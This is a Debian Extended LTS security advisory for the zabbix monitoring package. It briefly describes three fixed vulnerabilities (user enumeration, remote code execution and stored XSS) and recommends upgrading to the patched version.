ELA-406-1 zabbix security update
ELA-406-1 zabbix security update
Package zabbix
Version 1:2.2.23+dfsg-0+deb8u2
Related CVEs CVE-2019-15132 CVE-2020-11800 CVE-2020-15803
Multiple vulnerabilities were discovered in Zabbix, a network monitoring solution. An attacker may remotely execute code on the zabbix server, enumerate valid users and redirect to external links through the zabbix web frontend.
CVE-2019-15132
Zabbix allows User Enumeration. With login requests, it is possible to enumerate application usernames based on the variability of server responses (e.g., the “Login name or password is incorrect” and “No permissions for system access” messages, or just blocking for a number of seconds). This affects both api_jsonrpc.php and index.php.
CVE-2020-11800
Zabbix allows remote attackers to execute arbitrary code on the Zabbix server.
CVE-2020-15803
Zabbix allows stored XSS in the URL Widget.
For Debian 8 jessie, these problems have been fixed in version 1:2.2.23+dfsg-0+deb8u2.
We recommend that you upgrade your zabbix packages.
Further information about Extended LTS security advisories can be found at: https://deb.freexian.com/extended-lts/
A zabbix security update has been released for Debian GNU/Linux 8 Extended LTS to address multiple vulnerabilities.
